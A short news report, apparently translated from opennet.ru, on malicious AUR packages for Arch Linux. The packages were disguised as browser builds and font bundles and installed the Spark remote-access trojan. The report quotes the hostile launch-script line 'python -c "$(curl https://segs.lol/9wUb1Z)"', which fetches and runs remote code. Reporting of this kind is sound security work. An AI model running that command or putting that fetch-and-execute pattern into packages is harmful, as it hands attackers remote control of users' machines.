In the Arch AUR repository Linux 6 more malicious packages have been identified

In the AUR (Arch User Repository) repository used by Arch Linux To distribute third-party packages, malicious code embedded in unofficial browser builds continued to be published. In addition to the malicious packages firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin discovered two weeks ago, the google-chrome-stable package was added to the AUR, also containing a modification that installs a malicious component that provides remote access to the system.

The PKGBUILD file of the problematic package defined the installation of a script for launching the google-chrome-stable.sh browser, which, among other things, contained the command 'python -c "$(curl https://segs.lol/9wUb1Z)"', which downloaded malware recognized by the VirusTotal service as the Spark Trojan, which allows remote control of the system, launching processes, transferring files, inspecting traffic and sending screenshots.

The malicious package google-chrome-stable was uploaded the day before yesterday and was removed by AUR administrators a few hours after it appeared. Almost immediately after the removal of google-chrome-stable, two malicious packages were uploaded to the AUR - "chrome" and "chrome-bin", containing a similar script for installing malware on the user's system.

Three more packages containing malicious code were then detected: ttf-mac-fonts-all, ttf-ms-fonts-all and gromit.

Source: opennet.ru

Buy reliable hosting for sites with DDoS protection, VPS VDS servers πŸ”₯ Buy reliable website hosting with DDoS protection, VPS VDS servers | ProHoster